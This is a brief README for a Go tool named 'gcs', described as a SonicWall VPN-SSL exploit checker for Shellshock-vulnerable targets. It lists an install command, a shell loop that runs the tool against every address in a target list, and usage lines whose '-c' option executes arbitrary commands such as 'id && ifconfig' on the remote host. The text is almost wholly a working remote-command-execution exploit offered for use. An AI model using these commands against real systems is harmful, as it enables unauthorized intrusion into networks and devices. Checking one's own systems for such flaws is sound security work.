SonicWall VPN-SSL Exploit Checker* using Golang ( * and other targets vulnerable to shellshock ).
▶ go get -v github.com/gustavorobertux/gcs
▶ for i in $(cat list.txt) ; do echo $i | xargs gcs -i ; done
▶ gcs -i x.x.x.x
▶ gcs -i x.x.x.x -c id
▶ gcs -i x.x.x.x -c 'id && ifconfig'